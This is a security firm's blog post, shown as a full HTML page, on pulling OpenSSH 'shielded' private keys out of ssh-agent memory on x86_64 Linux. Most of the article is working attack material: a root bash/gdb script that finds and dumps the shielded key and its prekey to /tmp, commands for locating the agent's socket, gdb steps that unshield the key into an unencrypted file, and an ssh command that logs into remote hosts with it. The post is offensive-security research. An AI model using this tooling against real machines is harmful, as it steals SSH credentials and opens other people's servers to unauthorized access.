<!doctype html>
<html lang="en-US">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">

    <link rel="icon" href="https://security.humanativaspa.it/sec/wp-content/uploads/2021/04/favicon.png" type="image/x-icon" />
    <link rel="shortcut icon" href="https://security.humanativaspa.it/sec/wp-content/uploads/2021/04/favicon.png" type="image/x-icon" />

	<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO plugin v17.8 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) - hn security</title>
	<meta name="description" content="Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)" />
	<link rel="canonical" href="https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) - hn security" />
	<meta property="og:description" content="Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)" />
	<meta property="og:url" content="https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/" />
	<meta property="og:site_name" content="hn security" />
	<meta property="article:published_time" content="2021-07-23T08:50:40+00:00" />
	<meta property="article:modified_time" content="2021-09-04T09:13:38+00:00" />
	<meta property="og:image" content="https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/2387206.png" />
	<meta property="og:image:width" content="379" />
	<meta property="og:image:height" content="379" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Piergiovanni Cipolloni" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="5 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://security.humanativaspa.it/#organization","name":"HN SECURITY","url":"https://security.humanativaspa.it/","sameAs":[],"logo":{"@type":"ImageObject","@id":"https://security.humanativaspa.it/#logo","inLanguage":"en-US","url":"https://security.humanativaspa.it/sec/wp-content/uploads/2021/04/hn-sec.png","contentUrl":"https://security.humanativaspa.it/sec/wp-content/uploads/2021/04/hn-sec.png","width":250,"height":79,"caption":"HN SECURITY"},"image":{"@id":"https://security.humanativaspa.it/#logo"}},{"@type":"WebSite","@id":"https://security.humanativaspa.it/#website","url":"https://security.humanativaspa.it/","name":"hn security","description":"Offensive Security Specialists","publisher":{"@id":"https://security.humanativaspa.it/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://security.humanativaspa.it/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#primaryimage","inLanguage":"en-US","url":"https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/2387206.png","contentUrl":"https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/2387206.png","width":379,"height":379},{"@type":"WebPage","@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#webpage","url":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/","name":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux) - hn security","isPartOf":{"@id":"https://security.humanativaspa.it/#website"},"primaryImageOfPage":{"@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#primaryimage"},"datePublished":"2021-07-23T08:50:40+00:00","dateModified":"2021-09-04T09:13:38+00:00","description":"Some notes about retrieving an OpenSSH shielded private key from ssh-agent process memory (gcore dump)","breadcrumb":{"@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/"]}]},{"@type":"BreadcrumbList","@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://security.humanativaspa.it/"},{"@type":"ListItem","position":2,"name":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)"}]},{"@type":"Article","@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#article","isPartOf":{"@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#webpage"},"author":{"@id":"https://security.humanativaspa.it/#/schema/person/4edc794ab7283789f8c3026dbe8b5b75"},"headline":"OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)","datePublished":"2021-07-23T08:50:40+00:00","dateModified":"2021-09-04T09:13:38+00:00","mainEntityOfPage":{"@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#webpage"},"wordCount":490,"publisher":{"@id":"https://security.humanativaspa.it/#organization"},"image":{"@id":"https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/#primaryimage"},"thumbnailUrl":"https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/2387206.png","keywords":["ghidra","OpenSSH","penetration test","reverse engineering"],"articleSection":["Articles","News","Tools"],"inLanguage":"en-US"},{"@type":"Person","@id":"https://security.humanativaspa.it/#/schema/person/4edc794ab7283789f8c3026dbe8b5b75","name":"Piergiovanni Cipolloni","image":{"@type":"ImageObject","@id":"https://security.humanativaspa.it/#personlogo","inLanguage":"en-US","url":"https://secure.gravatar.com/avatar/9c9589c1ca502cf4236085ee1b224e21?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/9c9589c1ca502cf4236085ee1b224e21?s=96&d=mm&r=g","caption":"Piergiovanni Cipolloni"},"url":"https://security.humanativaspa.it/author/piergiovanni-cipolloni/"}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="hn security &raquo; Feed" href="https://security.humanativaspa.it/feed/" />
<link rel="alternate" type="application/rss+xml" title="hn security &raquo; Comments Feed" href="https://security.humanativaspa.it/comments/feed/" />
		<script>
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/security.humanativaspa.it\/sec\/wp-includes\/js\/wp-emoji-release.min.js"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style>
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://security.humanativaspa.it/sec/wp-includes/css/dist/block-library/style.min.css' media='all' />
<link rel='stylesheet' id='cookie-law-info-css'  href='https://security.humanativaspa.it/sec/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=2.0.6' media='all' />
<link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://security.humanativaspa.it/sec/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.0.6' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='https://security.humanativaspa.it/sec/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.3.9' media='all' />
<style id='rs-plugin-settings-inline-css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='master-am-style-css'  href='https://security.humanativaspa.it/sec/wp-content/themes/master-am/style.css?ver=1.0.0' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://security.humanativaspa.it/sec/wp-content/themes/master-am/css/bootstrap/bootstrap.css' media='all' />
<link rel='stylesheet' id='custom-css'  href='https://security.humanativaspa.it/sec/wp-content/themes/master-am/sass/style.css' media='all' />
<link rel='stylesheet' id='animatecss-css'  href='https://security.humanativaspa.it/sec/wp-content/themes/master-am/css/animate.min.css' media='all' />
<link rel='stylesheet' id='wpb-google-fonts-css'  href='https://fonts.googleapis.com/css2?family=Roboto%3Awght%40100%3B300%3B400%3B500%3B700%3B900&#038;display=swap' media='all' />
<link rel='stylesheet' id='enlighterjs-css'  href='https://security.humanativaspa.it/sec/wp-content/plugins/enlighter/cache/enlighterjs.min.css?ver=0A0B0C' media='all' />
<script src='https://security.humanativaspa.it/sec/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script src='https://security.humanativaspa.it/sec/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script id='cookie-law-info-js-extra'>
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[],"non_necessary_cookies":[],"ccpaEnabled":"","ccpaRegionBased":"","ccpaBarEnabled":"","strictlyEnabled":["necessary","obligatoire"],"ccpaType":"gdpr","js_blocking":"1","custom_integration":"","triggerDomRefresh":"","secure_cookies":""};
var cli_cookiebar_settings = {"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#61a229","button_1_button_hover":"#4e8221","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":"","button_2_hidebar":"","button_3_button_colour":"#3566bb","button_3_button_hover":"#2a5296","button_3_link_colour":"#fff","button_3_as_button":"1","button_3_new_win":"","button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#333333","button_4_as_button":"","button_7_button_colour":"#61a229","button_7_button_hover":"#4e8221","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"1","notify_animate_show":"","notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":"","scroll_close_reload":"","accept_close_reload":"","reject_close_reload":"","showagain_tab":"","showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#333333","show_once_yn":"","show_once":"10000","logging_on":"","as_popup":"","popup_overlay":"1","bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"};
var log_object = {"ajax_url":"https:\/\/security.humanativaspa.it\/sec\/wp-admin\/admin-ajax.php"};
</script>
<script src='https://security.humanativaspa.it/sec/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.0.6' id='cookie-law-info-js'></script>
<script src='https://security.humanativaspa.it/sec/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.3.9' id='tp-tools-js'></script>
<script src='https://security.humanativaspa.it/sec/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.3.9' id='revmin-js'></script>
<script src='https://security.humanativaspa.it/sec/wp-content/themes/master-am/js/bootstrap.min.js?ver=5.0.1' id='bootstrap-js'></script>
<script src='https://security.humanativaspa.it/sec/wp-content/themes/master-am/js/custom.js?ver=1' id='custom-js'></script>
<link rel="https://api.w.org/" href="https://security.humanativaspa.it/wp-json/" /><link rel="alternate" type="application/json" href="https://security.humanativaspa.it/wp-json/wp/v2/posts/313" /><link rel='shortlink' href='https://security.humanativaspa.it/?p=313' />
<link rel="alternate" type="application/json+oembed" href="https://security.humanativaspa.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurity.humanativaspa.it%2Fopenssh-ssh-agent-shielded-private-key-extraction-x86_64-linux%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://security.humanativaspa.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurity.humanativaspa.it%2Fopenssh-ssh-agent-shielded-private-key-extraction-x86_64-linux%2F&#038;format=xml" />
    
		<!-- Global site tag (gtag.js) - Google Analytics -->
		<script async src="https://www.googletagmanager.com/gtag/js?id=G-04NRZYC5DQ"></script>
		<script>
		window.dataLayer = window.dataLayer || [];
		function gtag(){dataLayer.push(arguments);}
		gtag('js', new Date());

		gtag('config', 'G-04NRZYC5DQ');
		</script>
    
    			<script type="text/javascript">
				var cli_flush_cache = true;
			</script>
<meta name="generator" content="Powered by Slider Revolution 6.3.9 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />
<script type="text/javascript">function setREVStartSize(e){
			//window.requestAnimationFrame(function() {				 
				window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW;	
				window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;	
				try {								
					var pw = document.getElementById(e.c).parentNode.offsetWidth,
						newh;
					pw = pw===0 || isNaN(pw) ? window.RSIW : pw;
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
					e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
					e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
					e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		
					if(e.layout==="fullscreen" || e.l==="fullscreen") 						
						newh = Math.max(e.mh,window.RSIH);					
					else{					
						e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el;
						e.gh = Array.isArray(e.gh) ? e.gh : [e.gh];
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
											
						var nl = new Array(e.rl.length),
							ix = 0,						
							sl;					
						e.tabw = e.tabhide>=pw ? 0 : e.tabw;
						e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw;
						e.tabh = e.tabhide>=pw ? 0 : e.tabh;
						e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh;					
						for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i];
						sl = nl[0];									
						for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;}															
						var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					
						newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
					}				
					if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					
					document.getElementById(e.c).height = newh+"px";
					window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				
				} catch(e){
					console.log("Failure at Presize of Slider:" + e)
				}					   
			//});
		  };</script>
</head>

<body class="post-template-default single single-post postid-313 single-format-standard no-sidebar">
	<header class="site-header">
        <div class="container-fluid bg-dark">
            <div class="container">
                <div class="row">
                    <div class="col-3 p-0">
                                            </div>
                    <div class="col-9">
                                            </div>                        
                </div>
            </div>
        </div>    
        <div id="navbar">
            <div id="container-nav" class="container-fluid p-0">
                    <div class="container">        
                        <nav class="navbar navbar-expand-lg navbar-dark">
                        <div class="container-fluid nav-bar-align-right">
                            <a class="navbar-brand " href="https://security.humanativaspa.it/">
                                <img class="img-fluid max-w-resp" src="https://security.humanativaspa.it/sec/wp-content/themes/master-am/images/hn-security-logo.png" alt="Humanativa" />                
                            </a>                
                            <button class="navbar-toggler navbar-toggler-right" type="button" data-bs-toggle="collapse" data-bs-target="#navbarText" aria-controls="navbarText" aria-expanded="false" aria-label="Toggle navigation">
                            <span class="navbar-toggler-icon"></span>
                            </button>
                                <div class="collapse navbar-collapse justify-content-end mt-3 text-center collapse-resp rounded" id="navbarText">
                                <ul class="navbar-nav me-0">
                                    <li class="nav-item" onclick="hideMenu()">
                                       

             <div id="myNav" class="nav-item "><ul id="menu-topmenu" class="navbar-nav"><li id="menu-item-120" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-120"><a title="Home" href="https://security.humanativaspa.it/">Home</a></li>
<li id="menu-item-377" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-377"><a title="About Us" href="https://security.humanativaspa.it/#aboutus">About Us</a></li>
<li id="menu-item-378" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-378"><a title="Services" href="https://security.humanativaspa.it/#services">Services</a></li>
<li id="menu-item-81" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-81"><a title="Blog" href="https://security.humanativaspa.it/category/news/">Blog</a></li>
</ul></div>                                    </li>
                                </ul>
                                <span class="navbar-text mt-1">
                                <a href="#" class="simple-btn ml-3" data-bs-toggle="modal" data-bs-target="#contactus">Contacts</a>
                                </span>
                                </div>
                        </div>
                        </nav>
                </div>
                </row>
            </div>
        </div>
        <!-- Modal -->
        <div class="modal fade" id="contactus" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
            <div class="modal-dialog modal-lg">
            <div class="modal-content">
            <div class="modal-header">
                <h3 class="title-gradient">Contacts</h3>
                <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
            </div>
            <div class="modal-body text-graydark">
                For tailored, superior quality offensive security services get in touch with us at <a href="mailto:info@hnsecurity.it">info@hnsecurity.it</a>
            <!---->
            </div>
            </div>
        </div>


	</header><!-- #masthead -->

    <div class="container-fluid p-0 bg-multiple-img mt-3 d-flex align-items-start">

        <div id="content" class="container pl-3 pr-3">






	<main id="primary" class="site-main">

		

<div class="container mt-5 mb-5">
	<div class="row">

		<!-- Article -->
		<div class="col-lg-9 col-sm-12 bg-white p-4 mb-4 rounded">

		
		<article id="post-313" class="post-313 post type-post status-publish format-standard has-post-thumbnail hentry category-articles category-news category-tools tag-ghidra tag-openssh tag-penetration-test tag-reverse-engineering">
			<header class="entry-header">
				<div class="entry-meta text-graylight mt-3">
					<span class="posted-on">Posted on <a href="https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/" rel="bookmark"><time class="entry-date published" datetime="2021-07-23T10:50:40+02:00">23 July 2021</time><time class="updated" datetime="2021-09-04T11:13:38+02:00">4 September 2021</time></a></span>					Piergiovanni Cipolloni				</div>
				<h3 class="mt-0 mb-0 text-graydark">OpenSSH ssh-agent Shielded Private Key Extraction (x86_64 Linux)</h3>				<!-- .entry-meta -->
			</header><!-- .entry-header -->

			<!---->

					<div class="entry-content text-graydark">
						<p class="md-end-block md-p"><span class="md-plain">This is just a quick blog post of some notes I thought I&#8217;d share.</span></p>
<p class="md-end-block md-p"><span class="md-plain">While most of you guys were furiously grep-ing </span><span class="md-meta-i-c md-link"><a href="https://twitter.com/jonasLyk/status/1393058962942083076"><span class="md-plain">TermService</span></a><span class="md-plain"> memory for clear-text passwords 🙂  I found myself searching for plain-text private keys in a <strong>ssh-agent</strong> process memory on a Linux box. Last time I did something similar was definitely before June 2019, when </span><a href="https://marc.info/?l=openbsd-cvs&amp;m=156109087822676&amp;w=2"><span class="md-plain">Shielded Private Keys</span></a><span class="md-plain"> were introduced in OpenSSH, therefore the tools I have available don&#8217;t work anymore. </span></span></p>
<p class="md-end-block md-p"><span class="md-plain"><strong>Shielded Private Keys</strong> were introduced in order to prevent Spectre/Meltdown attacks against ssh keys held in memory by ssh-agent. Basically when you ssh-add a key to ssh-agent, the key is encrypted (shielded) with a symmetric key derived from a random 16KB pre_key. </span></p>
<p class="md-end-block md-p"><span class="md-plain">Identities managed by ssh-agent are represented by a (list of) Identity struct which contains a reference to the key comment and a pointer to the associated key; the new shielded key and its pre_key are both referenced within this sshkey struct by the <strong>shielded_private</strong> and <strong>shield_prekey</strong> pointers.</span></p>
<p><img loading="lazy" class="aligncenter wp-image-322 size-full" src="https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/A-copia.png" alt="" width="792" height="648" srcset="https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/A-copia.png 792w, https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/A-copia-300x245.png 300w, https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/A-copia-768x628.png 768w" sizes="(max-width: 792px) 100vw, 792px" /></p>
<p class="md-end-block md-p md-focus"><span class="md-plain">So if we look in the heap for XREFs to the address of the key comment we should be able to find the sshkey struct; also knowing its last field is always set to 0x4000 (16KB) which is the fixed shield_prekey_len helps in identifying the sshkey struct.</span></p>
<p class="md-end-block md-p"><span class="md-plain">To quickly prove the above, I wrote the following bash/gdb script that dumps the private shielded key and its pre_key:</span></p>
<pre class="EnlighterJSRAW" data-enlighter-language="shell">#!/bin/bash

GDB=/usr/bin/gdb

if [[ $# -lt 2 ]]; then
        echo "Usage: ./script [pid] [key comment]" &gt;&amp;2
        exit 2
fi

PID=$1
COMMENT=$2
COMMENT_LEN=${#COMMENT}
HEAP=$(cat /proc/$PID/maps | grep heap)
#echo $HEAP
START=0x${HEAP:0:12}
END=0x${HEAP:13:12}
COMMADDR=$($GDB -p $PID -batch -ex "find $START, $END, {char[$COMMENT_LEN]}\"$COMMENT\"" 2&gt;/dev/null | egrep ^0[xX][0-9a-fA-F]{12}$)
echo "[ - ] Searching for key comment string in memory -&gt; Here's what I found:"
echo "$COMMADDR"
echo "[ - ] Now searching for XREFs to the comment addresses we found -&gt; looking for heap addresses"
for i in $COMMADDR; do
        TEMPF="\x${i:12:2}\x${i:10:2}\x${i:8:2}\x${i:6:2}\x${i:4:2}\x${i:2:2}"
        TEMPPTR=$($GDB -p $PID -batch -ex "find $START, $END, {char[6]}\"$TEMPF\"" 2&gt;/dev/null | egrep ^0[xX][0-9a-fA-F]{12}$)
        for j in $TEMPPTR; do
        VAR2=$(($j - 0x8)) # Identity-&gt;j = char *comment; Identity-&gt;(j - 0x8) = struct sshkey *key;
                VAR=$($GDB -p $PID -batch -ex "x/za $VAR2" 2&gt;/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:) 
        VAR3=${VAR:15}
        echo "[ o ] XREF $j contains $VAR3 let's see if it is in the heap"
        if (($VAR3 &gt; $START))
        then
            if (($VAR3 &lt; $END))
            then
                echo "[ + ] Found a XREF in the heap $VAR3 -&gt; searching for a sshkey struct at this address"
                KEYPOS=$(($VAR3 + 0xa0))
                KEYLEN=$($GDB -p $PID -batch -ex "x/d $KEYPOS" 2&gt;/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                echo "SHIELD_PRIVATE_LEN ${KEYLEN:15}"
                KEYLEN1=${KEYLEN:15}
                if (($KEYLEN1 != 16384)) 
                then 
                    echo "[ - ] Key not found -&gt; now onto the next ptr"
                    continue
                else	
                    echo "[ + ] Found the shielded private key -&gt; now dumping it"
                    SHPOS=$(($VAR3 + 0x88))
                    SPPOS=$(($VAR3 + 0x98))
                    PKEYLENPOS=$(($VAR3 + 0x90))
                    SHIELDED_PRIVATE=$($GDB -p $PID -batch -ex "x/za $SHPOS" 2&gt;/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    SHIELDED_PREKEY=$($GDB -p $PID -batch -ex "x/za $SPPOS" 2&gt;/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    PKEYLEN=$($GDB -p $PID -batch -ex "x/za $PKEYLENPOS"  2&gt;/dev/null | egrep ^0[xX][a-f0-9A-F]{12}\:)
                    printf "SHIELDED_PRIVATE %s\r\n" ${SHIELDED_PRIVATE:15}
                    printf "SHIELDED_LENGTH %d\r\n" ${PKEYLEN:15}
                    printf "SHIELD_PREKEY %s\r\n" ${SHIELDED_PREKEY:15}
                    printf "SHIELD_PREKEY_LEN 16384\r\n"
                    exec $GDB -p $PID &lt;&lt;EOF
set \$fd = fopen("/tmp/shielded_private", "w")
call fwrite(${SHIELDED_PRIVATE:15}, 1, ${PKEYLEN:15}, \$fd)
call fflush(\$fd)
call fclose(\$fd)
set \$fd = fopen("/tmp/shield_prekey", "w")
call fwrite(${SHIELDED_PREKEY:15}, 1, 16384, \$fd)
call fflush(\$fd)
call fclose(\$fd)
detach
quit
EOF
                fi
            fi
        fi
        done
done</pre>
<p>Run it as the root user as follows:<br />
<code><br />
# ps auxw | grep ssh-agent # find ssh-agent-pid<br />
# lsof -p ssh-agent-pid | grep unix # find target-unix-socket-path<br />
# export SSH_AUTH_SOCK=target-unix-socket-path<br />
# ssh-add -l # find key@comment<br />
# ./ospkd.sh ssh-agent-pid key@comment<br />
</code></p>
<p>In action:</p>
<p data-wp-editing="1"><img loading="lazy" class="aligncenter wp-image-318 size-full" src="https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/grab1.gif" alt="" width="2190" height="1400" /></p>
<p><em><span class="md-plain">Note: this also works if the ssh-agent is locked (ssh-add -x).</span></em></p>
<p>To avoid messing with the process memory as my script does, since gdb is available anyway a more convenient approach is to use <strong>gcore</strong> to dump the process memory which we can later parse with <strong>Ghidra</strong>; attached below there is a very simple Ghidra script which performs the same thing on a ssh-agent gcore file.</p>
<p><code>$ analyzeHeadless ~/project.rep project -import core.2225 -scriptPath ~/ghidra_scripts -postScript ospke.java key@comment /tmp</code></p>
<p>Now that we have the shielded private key and its pre key,<strong> how do we unshield it</strong>? After a couple attempts I realized that I needed only two functions and, guess what, ssh-keygen is the only binary that implements both. The two functions are sshkey_unshield_private() and sshkey_save_private() (to be invoked with a blank password). So the quickest solution I came up with was compiling ssh-keygen with symbols on my local machine:<br />
<code><br />
$ tar xvfz openssh-8.6p1.tar.gz<br />
$ cd openssh-8.6p1<br />
$ ./configure --with-audit=debug<br />
$ make ssh-keygen<br />
$ gdb ./ssh-keygen<br />
</code></p>
<p>Then pasted the following into gdb:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">b main
b sshkey_free
r
set $miak = (struct sshkey *)sshkey_new(0)
set $shielded_private = (unsigned char *)malloc(1392)
set $shield_prekey = (unsigned char *)malloc(16384)
set $fd = fopen("/tmp/shielded_private", "r")
call fread($shielded_private, 1, 1392, $fd)
call fclose($fd)
set $fd = fopen("/tmp/shield_prekey", "r")
call fread($shield_prekey, 1, 16384, $fd)
call fclose($fd)
set $miak-&gt;shielded_private=$shielded_private
set $miak-&gt;shield_prekey=$shield_prekey
set $miak-&gt;shielded_len=1392
set $miak-&gt;shield_prekey_len=16384
call sshkey_unshield_private($miak)
bt
f 1
x *kp
call sshkey_save_private(*kp, "/tmp/plaintext_private_key", "", "comment", 0, "\x00", 0)
k
q</pre>
<p><span class="md-plain">Now we can log into remote hosts using the retrieved key: </span></p>
<p><span class="md-plain"><code>$ ssh -i /tmp/plaintext_private_key user@host</code><br />
</span></p>
<p class="md-end-block md-p"><span class="md-plain">The reason why we break at sshkey_free() is because the gdb malloc&#8217;d sshkey_struct cannot be freed by sshkey_free() (I guess, lol), it would crash before saving the unshielded key. So we invoke sshkey_save_private() before the sshkey_free() is hit.</span></p>
<p><em><span class="md-plain">Note: this procedure was tested only against RSA and DSA keys on Ubuntu 20.04.2 LTS. and Kali Linux 2021.2. It may require some tweaking to work on other platforms.</span></em></p>
<p class="md-end-block md-p"><span class="md-plain"><a href="https://security.humanativaspa.it/sec/wp-content/uploads/2021/07/ospke.zip">Download the Ghidra script here</a>. Have fun!<br />
</span></p>
					</div><!-- .entry-content -->
			
					</article><!-- #post-313 -->

					

		</div>


		<!-- Sidenav -->
		<div class="col-lg-3 col-sm-12 text-white menu-box-single-page">
			<div class="lateral-menu">
